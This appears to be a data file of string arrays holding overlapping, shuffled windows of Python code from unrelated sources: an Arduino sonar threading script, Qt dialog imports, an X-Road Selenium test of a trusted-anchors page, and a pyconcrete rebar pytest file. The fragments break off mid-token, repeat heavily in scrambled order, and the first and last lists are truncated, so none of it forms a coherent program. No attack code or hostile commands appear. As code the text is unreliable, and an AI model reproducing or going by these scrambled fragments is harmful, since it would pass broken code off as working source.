__init__ (self, echoPino, text:str=None): Thread.__init__(self) self.echoPino = echoPino self.text = text def", "ports sonarEcho1 = board.get_pin('d:7:o') ## digital pin 7 OUTPUT sonarEcho2 = board.get_pin('d:8:o') ##", "Echo(Thread): def __init__ (self, echoPino, text:str=None): Thread.__init__(self) self.echoPino = echoPino self.text = text", "of 60ms -> see datasheet distance = ping_time_to_distance(time) print(f\"{self.text}\".format(time, distance)) ##Sonar 1: port", "echoPino self.text = text def run(self): while True: time = self.echoPino.ping() board.pass_time(0.06) #delay", "board.get_pin('d:8:o') ## digital pin 8 OUTPUT time.sleep(1) ### End set pins class Echo(Thread):", "self.echoPino.ping() board.pass_time(0.06) #delay of 60ms -> see datasheet distance = ping_time_to_distance(time) print(f\"{self.text}\".format(time, distance))", "time.sleep(1) ### End set pins class Echo(Thread): def __init__ (self, echoPino, text:str=None): Thread.__init__(self)", "pin configuration board = Arduino() # or Arduino(port) define board print(\"Communication successfully started!\")", "7 text_sonar1 = \"sonar1: Time: {0}ms, distance: {1}cm\" inicioEcho1 = Echo(sonarEcho1, text_sonar1) inicioEcho1.start()", "\"sonar1: Time: {0}ms, distance: {1}cm\" inicioEcho1 = Echo(sonarEcho1, text_sonar1) inicioEcho1.start() ##Sonar 2: port" ]
[ "CompoManagerDialog from .outputs_manager_dialog import OutputsManagerDialog from .project_manager_dialog import ProjectManagerDialog from .settings_dialog import SettingsDialog", "# -*- coding: utf-8 -*- from .comp_manager_dialog import CompoManagerDialog from .outputs_manager_dialog import OutputsManagerDialog", "-*- coding: utf-8 -*- from .comp_manager_dialog import CompoManagerDialog from .outputs_manager_dialog import OutputsManagerDialog from", "-*- from .comp_manager_dialog import CompoManagerDialog from .outputs_manager_dialog import OutputsManagerDialog from .project_manager_dialog import ProjectManagerDialog", "utf-8 -*- from .comp_manager_dialog import CompoManagerDialog from .outputs_manager_dialog import OutputsManagerDialog from .project_manager_dialog import", "from .comp_manager_dialog import CompoManagerDialog from .outputs_manager_dialog import OutputsManagerDialog from .project_manager_dialog import ProjectManagerDialog from", "import CompoManagerDialog from .outputs_manager_dialog import OutputsManagerDialog from .project_manager_dialog import ProjectManagerDialog from .settings_dialog import", ".comp_manager_dialog import CompoManagerDialog from .outputs_manager_dialog import OutputsManagerDialog from .project_manager_dialog import ProjectManagerDialog from .settings_dialog", "coding: utf-8 -*- from .comp_manager_dialog import CompoManagerDialog from .outputs_manager_dialog import OutputsManagerDialog from .project_manager_dialog" ]
[ "trusted anchors') self.log('FED_02 2. The instance identifier of the X-Road instance the trusted", "Open \"Trusted anchors\" tab') self.wait_until_visible(type=By.CSS_SELECTOR, element=TRUSTED_ANCHORS_TAB_CSS).click() self.wait_jquery() self.log('FED_01 2. System displays trusted anchors')", "ANCHOR_HASH_REGEX, GENERATED_AT_REGEX def test_view_trusted_anchors(self): def view_trusted_anchors(): self.log('Open global configuration view') self.wait_until_visible(type=By.CSS_SELECTOR, element=GLOBAL_CONFIGURATION_CSS).click() self.log('FED_01", "= get_generated_at(self) self.is_true(re.match(GENERATED_AT_REGEX, generated_at)) self.log('FED_02 The following user action options are displayed') self.log('FED_02", "\"Download a trusted anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DOWNLOAD_BTN_XPATH,", "GENERATED_AT_REGEX def test_view_trusted_anchors(self): def view_trusted_anchors(): self.log('Open global configuration view') self.wait_until_visible(type=By.CSS_SELECTOR, element=GLOBAL_CONFIGURATION_CSS).click() self.log('FED_01 1.", "The following user action options are displayed') self.log('FED_02 \"Upload a trusted anchor\" button", "TRUSTED_ANCHORS_TAB_CSS from view_models.sidebar import GLOBAL_CONFIGURATION_CSS from view_models.trusted_anchor import TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH, INSTANCE_IDENTIFIER, UPLOAD_ANCHOR_BTN_ID, \\ DOWNLOAD_BTN_XPATH,", "from view_models.trusted_anchor import TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH, INSTANCE_IDENTIFIER, UPLOAD_ANCHOR_BTN_ID, \\ DOWNLOAD_BTN_XPATH, DELETE_BTN_XPATH, ANCHOR_HASH, ANCHOR_HASH_REGEX, GENERATED_AT_REGEX def", "anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DELETE_BTN_XPATH, multiple=True))) > 0)", "\"Upload a trusted anchor\" button is visible') self.is_not_none(self.by_id(UPLOAD_ANCHOR_BTN_ID)) self.log('FED_02 \"Download a trusted anchor\"", "import GLOBAL_CONFIGURATION_CSS from view_models.trusted_anchor import TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH, INSTANCE_IDENTIFIER, UPLOAD_ANCHOR_BTN_ID, \\ DOWNLOAD_BTN_XPATH, DELETE_BTN_XPATH, ANCHOR_HASH, ANCHOR_HASH_REGEX,", "following user action options are displayed') self.log('FED_02 \"Upload a trusted anchor\" button is", "filter(lambda x: x.size['height'] > 0, self.by_css(ANCHOR_HASH, multiple=True))[0].text self.is_true(re.match(ANCHOR_HASH_REGEX, hash)) self.log('FED_02 2. The generation", "<gh_stars>1-10 import re from selenium.webdriver.common.by import By from tests.xroad_cs_upload_trusted_anchor.upload_trusted_anchor import get_generated_at from view_models.global_configuration", "self.wait_jquery() self.log('FED_01 2. System displays trusted anchors') self.log('FED_02 2. The instance identifier of", "generated_at = get_generated_at(self) self.is_true(re.match(GENERATED_AT_REGEX, generated_at)) self.log('FED_02 The following user action options are displayed')", "is visible') generated_at = get_generated_at(self) self.is_true(re.match(GENERATED_AT_REGEX, generated_at)) self.log('FED_02 The following user action options", "instance the trusted anchor ' 'originates from is visible') self.wait_until_visible(type=By.XPATH, element=TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH.format(INSTANCE_IDENTIFIER)) self.log('FED_02 2.", "x: x.size['height'] > 0, self.by_xpath(DOWNLOAD_BTN_XPATH, multiple=True))) > 0) self.log('FED_02 \"Delete a trusted anchor\"", "GLOBAL_CONFIGURATION_CSS from view_models.trusted_anchor import TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH, INSTANCE_IDENTIFIER, UPLOAD_ANCHOR_BTN_ID, \\ DOWNLOAD_BTN_XPATH, DELETE_BTN_XPATH, ANCHOR_HASH, ANCHOR_HASH_REGEX, GENERATED_AT_REGEX", "view') self.wait_until_visible(type=By.CSS_SELECTOR, element=GLOBAL_CONFIGURATION_CSS).click() self.log('FED_01 1. Open \"Trusted anchors\" tab') self.wait_until_visible(type=By.CSS_SELECTOR, element=TRUSTED_ANCHORS_TAB_CSS).click() self.wait_jquery() self.log('FED_01", "trusted anchor ' 'originates from is visible') self.wait_until_visible(type=By.XPATH, element=TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH.format(INSTANCE_IDENTIFIER)) self.log('FED_02 2. The SHA-224", "0) self.log('FED_02 \"Delete a trusted anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height'] >", "configuration view') self.wait_until_visible(type=By.CSS_SELECTOR, element=GLOBAL_CONFIGURATION_CSS).click() self.log('FED_01 1. Open \"Trusted anchors\" tab') self.wait_until_visible(type=By.CSS_SELECTOR, element=TRUSTED_ANCHORS_TAB_CSS).click() self.wait_jquery()", "tests.xroad_cs_upload_trusted_anchor.upload_trusted_anchor import get_generated_at from view_models.global_configuration import TRUSTED_ANCHORS_TAB_CSS from view_models.sidebar import GLOBAL_CONFIGURATION_CSS from view_models.trusted_anchor", "view_trusted_anchors(): self.log('Open global configuration view') self.wait_until_visible(type=By.CSS_SELECTOR, element=GLOBAL_CONFIGURATION_CSS).click() self.log('FED_01 1. Open \"Trusted anchors\" tab')", "the trusted anchor file is visible') hash = filter(lambda x: x.size['height'] > 0,", "visible') hash = filter(lambda x: x.size['height'] > 0, self.by_css(ANCHOR_HASH, multiple=True))[0].text self.is_true(re.match(ANCHOR_HASH_REGEX, hash)) self.log('FED_02", "action options are displayed') self.log('FED_02 \"Upload a trusted anchor\" button is visible') self.is_not_none(self.by_id(UPLOAD_ANCHOR_BTN_ID))", "element=TRUSTED_ANCHORS_TAB_CSS).click() self.wait_jquery() self.log('FED_01 2. System displays trusted anchors') self.log('FED_02 2. The instance identifier", "and time (UTC) of the trusted anchor file is visible') generated_at = get_generated_at(self)", "button is visible') self.is_not_none(self.by_id(UPLOAD_ANCHOR_BTN_ID)) self.log('FED_02 \"Download a trusted anchor\" button is visible') self.is_true(len(filter(lambda", "multiple=True))[0].text self.is_true(re.match(ANCHOR_HASH_REGEX, hash)) self.log('FED_02 2. The generation date and time (UTC) of the", "view_models.trusted_anchor import TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH, INSTANCE_IDENTIFIER, UPLOAD_ANCHOR_BTN_ID, \\ DOWNLOAD_BTN_XPATH, DELETE_BTN_XPATH, ANCHOR_HASH, ANCHOR_HASH_REGEX, GENERATED_AT_REGEX def test_view_trusted_anchors(self):", "import TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH, INSTANCE_IDENTIFIER, UPLOAD_ANCHOR_BTN_ID, \\ DOWNLOAD_BTN_XPATH, DELETE_BTN_XPATH, ANCHOR_HASH, ANCHOR_HASH_REGEX, GENERATED_AT_REGEX def test_view_trusted_anchors(self): def", "The instance identifier of the X-Road instance the trusted anchor ' 'originates from", "tab') self.wait_until_visible(type=By.CSS_SELECTOR, element=TRUSTED_ANCHORS_TAB_CSS).click() self.wait_jquery() self.log('FED_01 2. System displays trusted anchors') self.log('FED_02 2. The", "view_models.sidebar import GLOBAL_CONFIGURATION_CSS from view_models.trusted_anchor import TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH, INSTANCE_IDENTIFIER, UPLOAD_ANCHOR_BTN_ID, \\ DOWNLOAD_BTN_XPATH, DELETE_BTN_XPATH, ANCHOR_HASH,", "element=TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH.format(INSTANCE_IDENTIFIER)) self.log('FED_02 2. The SHA-224 hash value of the trusted anchor file is", "INSTANCE_IDENTIFIER, UPLOAD_ANCHOR_BTN_ID, \\ DOWNLOAD_BTN_XPATH, DELETE_BTN_XPATH, ANCHOR_HASH, ANCHOR_HASH_REGEX, GENERATED_AT_REGEX def test_view_trusted_anchors(self): def view_trusted_anchors(): self.log('Open", "\"Trusted anchors\" tab') self.wait_until_visible(type=By.CSS_SELECTOR, element=TRUSTED_ANCHORS_TAB_CSS).click() self.wait_jquery() self.log('FED_01 2. System displays trusted anchors') self.log('FED_02", "anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DOWNLOAD_BTN_XPATH, multiple=True))) > 0)", "1. Open \"Trusted anchors\" tab') self.wait_until_visible(type=By.CSS_SELECTOR, element=TRUSTED_ANCHORS_TAB_CSS).click() self.wait_jquery() self.log('FED_01 2. System displays trusted", "'originates from is visible') self.wait_until_visible(type=By.XPATH, element=TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH.format(INSTANCE_IDENTIFIER)) self.log('FED_02 2. The SHA-224 hash value of", "button is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DOWNLOAD_BTN_XPATH, multiple=True))) > 0) self.log('FED_02", "is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DELETE_BTN_XPATH, multiple=True))) > 0) return view_trusted_anchors", "from is visible') self.wait_until_visible(type=By.XPATH, element=TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH.format(INSTANCE_IDENTIFIER)) self.log('FED_02 2. The SHA-224 hash value of the", "self.log('FED_01 2. System displays trusted anchors') self.log('FED_02 2. The instance identifier of the", "anchors') self.log('FED_02 2. The instance identifier of the X-Road instance the trusted anchor", "self.log('FED_02 \"Delete a trusted anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0,", "is visible') hash = filter(lambda x: x.size['height'] > 0, self.by_css(ANCHOR_HASH, multiple=True))[0].text self.is_true(re.match(ANCHOR_HASH_REGEX, hash))", "trusted anchor\" button is visible') self.is_not_none(self.by_id(UPLOAD_ANCHOR_BTN_ID)) self.log('FED_02 \"Download a trusted anchor\" button is", "TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH, INSTANCE_IDENTIFIER, UPLOAD_ANCHOR_BTN_ID, \\ DOWNLOAD_BTN_XPATH, DELETE_BTN_XPATH, ANCHOR_HASH, ANCHOR_HASH_REGEX, GENERATED_AT_REGEX def test_view_trusted_anchors(self): def view_trusted_anchors():", "trusted anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DOWNLOAD_BTN_XPATH, multiple=True))) >", "import re from selenium.webdriver.common.by import By from tests.xroad_cs_upload_trusted_anchor.upload_trusted_anchor import get_generated_at from view_models.global_configuration import", "of the trusted anchor file is visible') hash = filter(lambda x: x.size['height'] >", "instance identifier of the X-Road instance the trusted anchor ' 'originates from is", "= filter(lambda x: x.size['height'] > 0, self.by_css(ANCHOR_HASH, multiple=True))[0].text self.is_true(re.match(ANCHOR_HASH_REGEX, hash)) self.log('FED_02 2. The", "self.is_not_none(self.by_id(UPLOAD_ANCHOR_BTN_ID)) self.log('FED_02 \"Download a trusted anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height'] >", "global configuration view') self.wait_until_visible(type=By.CSS_SELECTOR, element=GLOBAL_CONFIGURATION_CSS).click() self.log('FED_01 1. Open \"Trusted anchors\" tab') self.wait_until_visible(type=By.CSS_SELECTOR, element=TRUSTED_ANCHORS_TAB_CSS).click()", "self.is_true(re.match(ANCHOR_HASH_REGEX, hash)) self.log('FED_02 2. The generation date and time (UTC) of the trusted", "The generation date and time (UTC) of the trusted anchor file is visible')", "\\ DOWNLOAD_BTN_XPATH, DELETE_BTN_XPATH, ANCHOR_HASH, ANCHOR_HASH_REGEX, GENERATED_AT_REGEX def test_view_trusted_anchors(self): def view_trusted_anchors(): self.log('Open global configuration", "self.wait_until_visible(type=By.XPATH, element=TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH.format(INSTANCE_IDENTIFIER)) self.log('FED_02 2. The SHA-224 hash value of the trusted anchor file", "time (UTC) of the trusted anchor file is visible') generated_at = get_generated_at(self) self.is_true(re.match(GENERATED_AT_REGEX,", "visible') self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DOWNLOAD_BTN_XPATH, multiple=True))) > 0) self.log('FED_02 \"Delete a", "of the X-Road instance the trusted anchor ' 'originates from is visible') self.wait_until_visible(type=By.XPATH,", "is visible') self.wait_until_visible(type=By.XPATH, element=TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH.format(INSTANCE_IDENTIFIER)) self.log('FED_02 2. The SHA-224 hash value of the trusted", "self.log('FED_02 The following user action options are displayed') self.log('FED_02 \"Upload a trusted anchor\"", "The SHA-224 hash value of the trusted anchor file is visible') hash =", "> 0, self.by_xpath(DOWNLOAD_BTN_XPATH, multiple=True))) > 0) self.log('FED_02 \"Delete a trusted anchor\" button is", "of the trusted anchor file is visible') generated_at = get_generated_at(self) self.is_true(re.match(GENERATED_AT_REGEX, generated_at)) self.log('FED_02", "displayed') self.log('FED_02 \"Upload a trusted anchor\" button is visible') self.is_not_none(self.by_id(UPLOAD_ANCHOR_BTN_ID)) self.log('FED_02 \"Download a", "anchor\" button is visible') self.is_not_none(self.by_id(UPLOAD_ANCHOR_BTN_ID)) self.log('FED_02 \"Download a trusted anchor\" button is visible')", "a trusted anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DELETE_BTN_XPATH, multiple=True)))", "from view_models.sidebar import GLOBAL_CONFIGURATION_CSS from view_models.trusted_anchor import TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH, INSTANCE_IDENTIFIER, UPLOAD_ANCHOR_BTN_ID, \\ DOWNLOAD_BTN_XPATH, DELETE_BTN_XPATH,", "0, self.by_xpath(DOWNLOAD_BTN_XPATH, multiple=True))) > 0) self.log('FED_02 \"Delete a trusted anchor\" button is visible')", "2. The generation date and time (UTC) of the trusted anchor file is", "date and time (UTC) of the trusted anchor file is visible') generated_at =", "the trusted anchor file is visible') generated_at = get_generated_at(self) self.is_true(re.match(GENERATED_AT_REGEX, generated_at)) self.log('FED_02 The", "hash value of the trusted anchor file is visible') hash = filter(lambda x:", "def view_trusted_anchors(): self.log('Open global configuration view') self.wait_until_visible(type=By.CSS_SELECTOR, element=GLOBAL_CONFIGURATION_CSS).click() self.log('FED_01 1. Open \"Trusted anchors\"", "> 0) self.log('FED_02 \"Delete a trusted anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height']", "from tests.xroad_cs_upload_trusted_anchor.upload_trusted_anchor import get_generated_at from view_models.global_configuration import TRUSTED_ANCHORS_TAB_CSS from view_models.sidebar import GLOBAL_CONFIGURATION_CSS from", "a trusted anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DOWNLOAD_BTN_XPATH, multiple=True)))", "button is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DELETE_BTN_XPATH, multiple=True))) > 0) return", "from selenium.webdriver.common.by import By from tests.xroad_cs_upload_trusted_anchor.upload_trusted_anchor import get_generated_at from view_models.global_configuration import TRUSTED_ANCHORS_TAB_CSS from", "self.log('FED_02 \"Download a trusted anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0,", "self.wait_until_visible(type=By.CSS_SELECTOR, element=GLOBAL_CONFIGURATION_CSS).click() self.log('FED_01 1. Open \"Trusted anchors\" tab') self.wait_until_visible(type=By.CSS_SELECTOR, element=TRUSTED_ANCHORS_TAB_CSS).click() self.wait_jquery() self.log('FED_01 2.", "self.log('FED_01 1. Open \"Trusted anchors\" tab') self.wait_until_visible(type=By.CSS_SELECTOR, element=TRUSTED_ANCHORS_TAB_CSS).click() self.wait_jquery() self.log('FED_01 2. System displays", "value of the trusted anchor file is visible') hash = filter(lambda x: x.size['height']", "self.is_true(re.match(GENERATED_AT_REGEX, generated_at)) self.log('FED_02 The following user action options are displayed') self.log('FED_02 \"Upload a", "element=GLOBAL_CONFIGURATION_CSS).click() self.log('FED_01 1. Open \"Trusted anchors\" tab') self.wait_until_visible(type=By.CSS_SELECTOR, element=TRUSTED_ANCHORS_TAB_CSS).click() self.wait_jquery() self.log('FED_01 2. System", "x.size['height'] > 0, self.by_xpath(DOWNLOAD_BTN_XPATH, multiple=True))) > 0) self.log('FED_02 \"Delete a trusted anchor\" button", "get_generated_at(self) self.is_true(re.match(GENERATED_AT_REGEX, generated_at)) self.log('FED_02 The following user action options are displayed') self.log('FED_02 \"Upload", "def test_view_trusted_anchors(self): def view_trusted_anchors(): self.log('Open global configuration view') self.wait_until_visible(type=By.CSS_SELECTOR, element=GLOBAL_CONFIGURATION_CSS).click() self.log('FED_01 1. Open", "self.log('Open global configuration view') self.wait_until_visible(type=By.CSS_SELECTOR, element=GLOBAL_CONFIGURATION_CSS).click() self.log('FED_01 1. Open \"Trusted anchors\" tab') self.wait_until_visible(type=By.CSS_SELECTOR,", "' 'originates from is visible') self.wait_until_visible(type=By.XPATH, element=TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH.format(INSTANCE_IDENTIFIER)) self.log('FED_02 2. The SHA-224 hash value", "x.size['height'] > 0, self.by_css(ANCHOR_HASH, multiple=True))[0].text self.is_true(re.match(ANCHOR_HASH_REGEX, hash)) self.log('FED_02 2. The generation date and", "self.wait_until_visible(type=By.CSS_SELECTOR, element=TRUSTED_ANCHORS_TAB_CSS).click() self.wait_jquery() self.log('FED_01 2. System displays trusted anchors') self.log('FED_02 2. The instance", "0, self.by_css(ANCHOR_HASH, multiple=True))[0].text self.is_true(re.match(ANCHOR_HASH_REGEX, hash)) self.log('FED_02 2. The generation date and time (UTC)", "file is visible') hash = filter(lambda x: x.size['height'] > 0, self.by_css(ANCHOR_HASH, multiple=True))[0].text self.is_true(re.match(ANCHOR_HASH_REGEX,", "anchor ' 'originates from is visible') self.wait_until_visible(type=By.XPATH, element=TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH.format(INSTANCE_IDENTIFIER)) self.log('FED_02 2. The SHA-224 hash", "SHA-224 hash value of the trusted anchor file is visible') hash = filter(lambda", "hash)) self.log('FED_02 2. The generation date and time (UTC) of the trusted anchor", "hash = filter(lambda x: x.size['height'] > 0, self.by_css(ANCHOR_HASH, multiple=True))[0].text self.is_true(re.match(ANCHOR_HASH_REGEX, hash)) self.log('FED_02 2.", "a trusted anchor\" button is visible') self.is_not_none(self.by_id(UPLOAD_ANCHOR_BTN_ID)) self.log('FED_02 \"Download a trusted anchor\" button", "view_models.global_configuration import TRUSTED_ANCHORS_TAB_CSS from view_models.sidebar import GLOBAL_CONFIGURATION_CSS from view_models.trusted_anchor import TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH, INSTANCE_IDENTIFIER, UPLOAD_ANCHOR_BTN_ID,", "generation date and time (UTC) of the trusted anchor file is visible') generated_at", "trusted anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DELETE_BTN_XPATH, multiple=True))) >", "anchors\" tab') self.wait_until_visible(type=By.CSS_SELECTOR, element=TRUSTED_ANCHORS_TAB_CSS).click() self.wait_jquery() self.log('FED_01 2. System displays trusted anchors') self.log('FED_02 2.", "trusted anchor file is visible') generated_at = get_generated_at(self) self.is_true(re.match(GENERATED_AT_REGEX, generated_at)) self.log('FED_02 The following", "identifier of the X-Road instance the trusted anchor ' 'originates from is visible')", "selenium.webdriver.common.by import By from tests.xroad_cs_upload_trusted_anchor.upload_trusted_anchor import get_generated_at from view_models.global_configuration import TRUSTED_ANCHORS_TAB_CSS from view_models.sidebar", "displays trusted anchors') self.log('FED_02 2. The instance identifier of the X-Road instance the", "the X-Road instance the trusted anchor ' 'originates from is visible') self.wait_until_visible(type=By.XPATH, element=TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH.format(INSTANCE_IDENTIFIER))", "2. The SHA-224 hash value of the trusted anchor file is visible') hash", "anchor file is visible') generated_at = get_generated_at(self) self.is_true(re.match(GENERATED_AT_REGEX, generated_at)) self.log('FED_02 The following user", "user action options are displayed') self.log('FED_02 \"Upload a trusted anchor\" button is visible')", "import By from tests.xroad_cs_upload_trusted_anchor.upload_trusted_anchor import get_generated_at from view_models.global_configuration import TRUSTED_ANCHORS_TAB_CSS from view_models.sidebar import", "By from tests.xroad_cs_upload_trusted_anchor.upload_trusted_anchor import get_generated_at from view_models.global_configuration import TRUSTED_ANCHORS_TAB_CSS from view_models.sidebar import GLOBAL_CONFIGURATION_CSS", "visible') self.wait_until_visible(type=By.XPATH, element=TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH.format(INSTANCE_IDENTIFIER)) self.log('FED_02 2. The SHA-224 hash value of the trusted anchor", "self.by_css(ANCHOR_HASH, multiple=True))[0].text self.is_true(re.match(ANCHOR_HASH_REGEX, hash)) self.log('FED_02 2. The generation date and time (UTC) of", "self.log('FED_02 2. The generation date and time (UTC) of the trusted anchor file", "import TRUSTED_ANCHORS_TAB_CSS from view_models.sidebar import GLOBAL_CONFIGURATION_CSS from view_models.trusted_anchor import TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH, INSTANCE_IDENTIFIER, UPLOAD_ANCHOR_BTN_ID, \\", "visible') generated_at = get_generated_at(self) self.is_true(re.match(GENERATED_AT_REGEX, generated_at)) self.log('FED_02 The following user action options are", "self.by_xpath(DOWNLOAD_BTN_XPATH, multiple=True))) > 0) self.log('FED_02 \"Delete a trusted anchor\" button is visible') self.is_true(len(filter(lambda", "System displays trusted anchors') self.log('FED_02 2. The instance identifier of the X-Road instance", "DELETE_BTN_XPATH, ANCHOR_HASH, ANCHOR_HASH_REGEX, GENERATED_AT_REGEX def test_view_trusted_anchors(self): def view_trusted_anchors(): self.log('Open global configuration view') self.wait_until_visible(type=By.CSS_SELECTOR,", "multiple=True))) > 0) self.log('FED_02 \"Delete a trusted anchor\" button is visible') self.is_true(len(filter(lambda x:", "self.log('FED_02 2. The SHA-224 hash value of the trusted anchor file is visible')", "import get_generated_at from view_models.global_configuration import TRUSTED_ANCHORS_TAB_CSS from view_models.sidebar import GLOBAL_CONFIGURATION_CSS from view_models.trusted_anchor import", "UPLOAD_ANCHOR_BTN_ID, \\ DOWNLOAD_BTN_XPATH, DELETE_BTN_XPATH, ANCHOR_HASH, ANCHOR_HASH_REGEX, GENERATED_AT_REGEX def test_view_trusted_anchors(self): def view_trusted_anchors(): self.log('Open global", "are displayed') self.log('FED_02 \"Upload a trusted anchor\" button is visible') self.is_not_none(self.by_id(UPLOAD_ANCHOR_BTN_ID)) self.log('FED_02 \"Download", "from view_models.global_configuration import TRUSTED_ANCHORS_TAB_CSS from view_models.sidebar import GLOBAL_CONFIGURATION_CSS from view_models.trusted_anchor import TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH, INSTANCE_IDENTIFIER,", "DOWNLOAD_BTN_XPATH, DELETE_BTN_XPATH, ANCHOR_HASH, ANCHOR_HASH_REGEX, GENERATED_AT_REGEX def test_view_trusted_anchors(self): def view_trusted_anchors(): self.log('Open global configuration view')", "get_generated_at from view_models.global_configuration import TRUSTED_ANCHORS_TAB_CSS from view_models.sidebar import GLOBAL_CONFIGURATION_CSS from view_models.trusted_anchor import TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH,", "2. The instance identifier of the X-Road instance the trusted anchor ' 'originates", "re from selenium.webdriver.common.by import By from tests.xroad_cs_upload_trusted_anchor.upload_trusted_anchor import get_generated_at from view_models.global_configuration import TRUSTED_ANCHORS_TAB_CSS", "visible') self.is_not_none(self.by_id(UPLOAD_ANCHOR_BTN_ID)) self.log('FED_02 \"Download a trusted anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height']", "(UTC) of the trusted anchor file is visible') generated_at = get_generated_at(self) self.is_true(re.match(GENERATED_AT_REGEX, generated_at))", "> 0, self.by_css(ANCHOR_HASH, multiple=True))[0].text self.is_true(re.match(ANCHOR_HASH_REGEX, hash)) self.log('FED_02 2. The generation date and time", "options are displayed') self.log('FED_02 \"Upload a trusted anchor\" button is visible') self.is_not_none(self.by_id(UPLOAD_ANCHOR_BTN_ID)) self.log('FED_02", "is visible') self.is_not_none(self.by_id(UPLOAD_ANCHOR_BTN_ID)) self.log('FED_02 \"Download a trusted anchor\" button is visible') self.is_true(len(filter(lambda x:", "is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DOWNLOAD_BTN_XPATH, multiple=True))) > 0) self.log('FED_02 \"Delete", "X-Road instance the trusted anchor ' 'originates from is visible') self.wait_until_visible(type=By.XPATH, element=TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH.format(INSTANCE_IDENTIFIER)) self.log('FED_02", "the trusted anchor ' 'originates from is visible') self.wait_until_visible(type=By.XPATH, element=TRUSTED_ANCHOR_BY_IDENTIFIER_XPATH.format(INSTANCE_IDENTIFIER)) self.log('FED_02 2. The", "self.log('FED_02 2. The instance identifier of the X-Road instance the trusted anchor '", "file is visible') generated_at = get_generated_at(self) self.is_true(re.match(GENERATED_AT_REGEX, generated_at)) self.log('FED_02 The following user action", "\"Delete a trusted anchor\" button is visible') self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DELETE_BTN_XPATH,", "generated_at)) self.log('FED_02 The following user action options are displayed') self.log('FED_02 \"Upload a trusted", "trusted anchor file is visible') hash = filter(lambda x: x.size['height'] > 0, self.by_css(ANCHOR_HASH,", "self.is_true(len(filter(lambda x: x.size['height'] > 0, self.by_xpath(DOWNLOAD_BTN_XPATH, multiple=True))) > 0) self.log('FED_02 \"Delete a trusted", "self.log('FED_02 \"Upload a trusted anchor\" button is visible') self.is_not_none(self.by_id(UPLOAD_ANCHOR_BTN_ID)) self.log('FED_02 \"Download a trusted", "ANCHOR_HASH, ANCHOR_HASH_REGEX, GENERATED_AT_REGEX def test_view_trusted_anchors(self): def view_trusted_anchors(): self.log('Open global configuration view') self.wait_until_visible(type=By.CSS_SELECTOR, element=GLOBAL_CONFIGURATION_CSS).click()", "2. System displays trusted anchors') self.log('FED_02 2. The instance identifier of the X-Road", "x: x.size['height'] > 0, self.by_css(ANCHOR_HASH, multiple=True))[0].text self.is_true(re.match(ANCHOR_HASH_REGEX, hash)) self.log('FED_02 2. The generation date", "anchor file is visible') hash = filter(lambda x: x.size['height'] > 0, self.by_css(ANCHOR_HASH, multiple=True))[0].text", "test_view_trusted_anchors(self): def view_trusted_anchors(): self.log('Open global configuration view') self.wait_until_visible(type=By.CSS_SELECTOR, element=GLOBAL_CONFIGURATION_CSS).click() self.log('FED_01 1. Open \"Trusted" ]
[ "lr1.diameter == 20 def test_count_l(lr1): assert lr1.count == 2 def test_insert_l(lr1): assert lr1.insert", "assert ur1.text_len == 'L=200' r_scale = copy.deepcopy(r1) r_scale.scale(75, 20) assert r_scale.text_len == 'L=5'", "def test_points(r1): pts = [(0, 0), (5, 0)] assert r1.points() == pts def", "10 assert lr1.x2 == 15 assert lr1.y == 20 # def test_real_length(r1, lr1,", "r = rebar.URebar( length=200, diameter=16, count=4, insert=(0, 0), v_align='bot') return r def test_length(r1):", "rebar @pytest.fixture def r1(): r = rebar.Rebar( length=5, diameter=20, count=1, insert=(0, 0)) return", "0), (5, 0)] assert r1.points() == pts def test_length_L(lr1): assert lr1.length == 5", "ur1.y == 0 assert lr1.x1 == 10 assert lr1.x2 == 15 assert lr1.y", "assert r1.text == '1~20' assert lr1.text == '2~20' assert ur1.text == '4~16' def", "from pyconcrete import rebar @pytest.fixture def r1(): r = rebar.Rebar( length=5, diameter=20, count=1,", "assert lr1.length == 5 def test_diameter_l(lr1): assert lr1.diameter == 20 def test_count_l(lr1): assert", "== 15 assert lr1.y == 20 # def test_real_length(r1, 